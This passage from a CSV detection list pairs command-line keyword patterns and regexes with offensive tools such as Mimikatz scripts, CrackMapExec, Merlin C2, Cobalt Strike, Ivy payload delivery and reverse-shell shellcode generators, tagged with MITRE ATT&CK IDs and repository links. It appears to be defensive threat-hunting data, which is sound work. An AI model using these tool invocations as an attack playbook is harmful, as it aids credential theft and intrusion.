formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* invoke query *FROM SMS_Admin*",".{0,1000}\sinvoke\squery\s.{0,1000}FROM\sSMS_Admin.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1003 - T1021 - T1056 - T1059 - T1075 - T1078 - T1087 - T1098 - T1105 - T1110 - T1212 - T1547 - T1552 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/Mayyhem/SharpSCCM/","1","0","N/A","N/A","5","499","70","2024-04-15T16:18:32Z","2021-08-19T05:09:19Z" "* invoke_sessiongopher*",".{0,1000}\sinvoke_sessiongopher.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* invoke_vnc*",".{0,1000}\sinvoke_vnc.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "* Invoke-ADSBackdoor.ps1*",".{0,1000}\sInvoke\-ADSBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-DCOM.ps1*",".{0,1000}\sInvoke\-DCOM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - 
T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-DCOMPowerPointPivot.ps1*",".{0,1000}\sInvoke\-DCOMPowerPointPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-Dump.ps1*",".{0,1000}\sInvoke\-Dump\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","0","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "* Invoke-ExcelMacroPivot.ps1*",".{0,1000}\sInvoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-InternalMonologue.ps1*",".{0,1000}\sInvoke\-InternalMonologue\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool 
also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-Mimikatz.ps1*",".{0,1000}\sInvoke\-Mimikatz\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-PowerThIEf.ps1*",".{0,1000}\sInvoke\-PowerThIEf\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* Invoke-Stealth.ps1*",".{0,1000}\sInvoke\-Stealth\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "* Invoke-WMILM.ps1*",".{0,1000}\sInvoke\-WMILM\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* --ip * --port * --type cmd --language 
*",".{0,1000}\s\-\-ip\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-type\scmd\s\-\-language\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "* -ip * -smb2support *lwpshare* ",".{0,1000}\s\-ip\s.{0,1000}\s\-smb2support\s.{0,1000}lwpshare.{0,1000}\s","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -IP * -SpooferIP * -HTTP N*",".{0,1000}\s\-IP\s.{0,1000}\s\-SpooferIP\s.{0,1000}\s\-HTTP\sN.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "* --ip * --variable shellcode *",".{0,1000}\s\-\-ip\s.{0,1000}\s\-\-variable\sshellcode\s.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "* ip-forwarding.nse*",".{0,1000}\sip\-forwarding\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-geoplugin.nse*",".{0,1000}\sip\-geolocation\-geoplugin\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-ipinfodb.nse*",".{0,1000}\sip\-geolocation\-ipinfodb\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-map-bing.nse*",".{0,1000}\sip\-geolocation\-map\-bing\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-map-google.nse*",".{0,1000}\sip\-geolocation\-map\-google\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-map-kml.nse*",".{0,1000}\sip\-geolocation\-map\-kml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-geolocation-maxmind.nse*",".{0,1000}\sip\-geolocation\-maxmind\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ip-https-discover.nse*",".{0,1000}\sip\-https\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipidseq.nse*",".{0,1000}\sipidseq\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipmi-brute.nse*",".{0,1000}\sipmi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipmi-cipher-zero.nse*",".{0,1000}\sipmi\-cipher\-zero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipmi-version.nse*",".{0,1000}\sipmi\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* IPV6 addresses xored *",".{0,1000}\sIPV6\saddresses\sxored\s.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "* ipv6-multicast-mld-list.nse*",".{0,1000}\sipv6\-multicast\-mld\-list\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipv6-node-info.nse*",".{0,1000}\sipv6\-node\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ipv6-ra-flood.nse*",".{0,1000}\sipv6\-ra\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* irc-botnet-channels.nse*",".{0,1000}\sirc\-botnet\-channels\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* irc-brute.nse*",".{0,1000}\sirc\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* irc-info.nse*",".{0,1000}\sirc\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* irc-sasl-brute.nse*",".{0,1000}\sirc\-sasl\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* irc-unrealircd-backdoor.nse*",".{0,1000}\sirc\-unrealircd\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -isbeacon *",".{0,1000}\s\-isbeacon\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* iscsi-brute.nse*",".{0,1000}\siscsi\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* iscsi-info.nse*",".{0,1000}\siscsi\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* isns-info.nse*",".{0,1000}\sisns\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --isroca --publickey *",".{0,1000}\s\-\-isroca\s\-\-publickey\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* -it bloodhound*",".{0,1000}\s\-it\sbloodhound.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "* -Ix64 *.bin -Ix86 *.bin -P Inject -O *.png -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sInject\s\-O\s.{0,1000}\.png\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.hta -url http:* -delivery hta -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.hta\s\-url\shttp\:.{0,1000}\s\-delivery\shta\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of 
arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.js -url http* -delivery bits -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.js\s\-url\shttp.{0,1000}\s\-delivery\sbits\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.txt -url http* -delivery macro -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.txt\s\-url\shttp.{0,1000}\s\-delivery\smacro\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.bin -Ix86 *.bin -P Local -O *.xsl -url http* -delivery xsl -stageless*",".{0,1000}\s\-Ix64\s.{0,1000}\.bin\s\-Ix86\s.{0,1000}\.bin\s\-P\sLocal\s\-O\s.{0,1000}\.xsl\s\-url\shttp.{0,1000}\s\-delivery\sxsl\s\-stageless.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.c -Ix86 *.c -P Local -O 
*.js*",".{0,1000}\s\-Ix64\s.{0,1000}\.c\s\-Ix86\s.{0,1000}\.c\s\-P\sLocal\s\-O\s.{0,1000}\.js.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -Ix64 *.vba -Ix86 *.vba -P Inject -O *",".{0,1000}\s\-Ix64\s.{0,1000}\.vba\s\-Ix86\s.{0,1000}\.vba\s\-P\sInject\s\-O\s.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/optiv/Ivy","1","0","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "* -jar ysoserial.jar*",".{0,1000}\s\-jar\sysoserial\.jar.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* jdwp-exec.nse*",".{0,1000}\sjdwp\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* jdwp-info.nse*",".{0,1000}\sjdwp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
